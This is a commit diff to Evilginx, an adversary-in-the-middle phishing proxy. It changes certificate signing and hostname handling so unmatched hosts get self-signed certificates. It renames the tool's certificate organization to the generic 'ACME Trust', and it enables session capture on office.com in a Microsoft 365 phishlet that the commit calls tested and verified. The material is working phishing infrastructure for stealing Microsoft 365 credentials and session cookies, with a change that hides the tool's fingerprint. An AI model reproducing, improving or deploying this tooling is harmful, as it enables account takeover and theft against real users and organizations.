Removed unnecessary vendor folder (managed by module), some cleanup. …

…Will now redirect alternative hostnames using a self-signed certificate instead of running into a timeout. Phishlets that want to redirect visitors on all phished subdomains need to set domains as either a landing page or using sessions - tested and verified for o365.

core/certdb.go

@@ -419,10 +419,10 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
 	}
 
 	if x509ca, err = x509.ParseCertificate(d.CACert.Certificate[0]); err != nil {
-		return
+		return nil, err
 	}
 
-	if phish_host == "" {
+	if phish_host == "" || host == phish_host {
 		serialNumberLimit := new(big.Int).Lsh(big.NewInt(1), 128)
 		serialNumber, err := rand.Int(rand.Reader, serialNumberLimit)
 		if err != nil {
@@ -432,7 +432,7 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
 		template = x509.Certificate{
 			SerialNumber:          serialNumber,
 			Issuer:                x509ca.Subject,
-			Subject:               pkix.Name{Organization: []string{"Evilginx Signature Trust Co."}},
+			Subject:               pkix.Name{Organization: []string{"ACME Trust"}},
 			NotBefore:             time.Now(),
 			NotAfter:              time.Now().Add(time.Hour * 24 * 180),
 			KeyUsage:              x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature,
@@ -470,12 +470,12 @@ func (d *CertDb) SignCertificateForHost(host string, phish_host string, port int
 
 	var pkey *rsa.PrivateKey
 	if pkey, err = rsa.GenerateKey(rand.Reader, 1024); err != nil {
-		return
+		return nil, err
 	}
-
+	
 	var derBytes []byte
 	if derBytes, err = x509.CreateCertificate(rand.Reader, &template, x509ca, &pkey.PublicKey, d.CACert.PrivateKey); err != nil {
-		return
+		return nil, err
 	}
 
 	cert = &tls.Certificate{

core/config.go

@@ -357,7 +357,9 @@ func (c *Config) IsSiteHidden(site string) bool {
 func (c *Config) GetEnabledSites() []string {
 	var sites []string
 	for s := range c.sitesEnabled {
-		sites = append(sites, s)
+		if len(s) > 0 {
+			sites = append(sites, s)
+		}
 	}
 	return sites
 }
@@ -418,6 +420,10 @@ func (c *Config) refreshActiveHostnames() {
 	}
 }
 
+func (c *Config) GetActiveHostnames() []string {
+	return c.activeHostnames
+}
+
 func (c *Config) IsActiveHostname(host string) bool {
 	if host[len(host)-1:] == "." {
 		host = host[:len(host)-1]
@@ -520,7 +526,9 @@ func (c *Config) GetSiteDomain(site string) (string, bool) {
 func (c *Config) GetAllDomains() []string {
 	var ret []string
 	for _, dom := range c.siteDomains {
-		ret = append(ret, dom)
+		if len(dom) > 0 {
+			ret = append(ret, dom)
+		}
 	}
 	return ret
 }

core/http_proxy.go

@@ -198,7 +198,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 								vv = uv.Get(p.cfg.verificationParam)
 							}
 							if l != nil || vv == p.cfg.verificationToken {
-
 								// check if lure user-agent filter is triggered
 								if l != nil {
 									if len(l.UserAgentFilter) > 0 {
@@ -584,6 +583,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					}
 				}
 				p.cantFindMe(req, e_host)
+			} else {
+				log.Debug("host not proxied: %s", req.Host)
+				return p.blockRequest(req)
 			}
 
 			return req, nil
@@ -1092,7 +1094,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 			// check for lure hostname
 			cert, err := p.crt_db.GetHostnameCertificate(hostname)
 			if err != nil {
-				// check for phishlet hostname
+				// check for phishlet by hostname
 				pl := p.getPhishletByOrigHost(hostname)
 				if pl != nil {
 					phishDomain, ok := p.cfg.GetSiteDomain(pl.Name)
@@ -1102,6 +1104,9 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 							return nil, err
 						}
 					}
+				} else {
+					// If hostname has no phishlet, generate self-signed certificate
+					cert, err = p.crt_db.SignCertificateForHost(hostname, "", port)
 				}
 			}
 			if cert != nil {
@@ -1113,18 +1118,14 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
 			log.Debug("no SSL/TLS certificate for host '%s'", host)
 			return nil, fmt.Errorf("no SSL/TLS certificate for host '%s'", host)
 		} else {
-			var ok bool
 			phish_host := ""
 			if !p.cfg.IsLureHostnameValid(hostname) {
-				phish_host, ok = p.replaceHostWithPhished(hostname)
-				if !ok {
-					log.Debug("phishing hostname not found: %s", hostname)
-					return nil, fmt.Errorf("phishing hostname not found")
-				}
+				phish_host, _ = p.replaceHostWithPhished(hostname)
 			}
 
 			cert, err := p.crt_db.SignCertificateForHost(hostname, phish_host, port)
 			if err != nil {
+				log.Debug("error signing certificate: %v", err)
 				return nil, err
 			}
 			return &tls.Config{
@@ -1197,13 +1198,7 @@ func (p *HttpProxy) httpsWorker() {
 				return
 			}
 
-			if !p.cfg.IsActiveHostname(hostname) {
-				log.Debug("hostname unsupported: %s", hostname)
-				return
-			}
-
 			hostname, _ = p.replaceHostWithOriginal(hostname)
-
 			req := &http.Request{
 				Method: "CONNECT",
 				URL: &url.URL{

phishlets/o365.yaml

@@ -3,7 +3,7 @@ author: '@jamescullum'
 min_ver: '2.3.0'
 proxy_hosts:
   - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
-  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
+  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing:false}
   # The lines below are needed if your target organization utilizes ADFS.
   # If they do, you need to uncomment all following lines that contain <...>
   # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.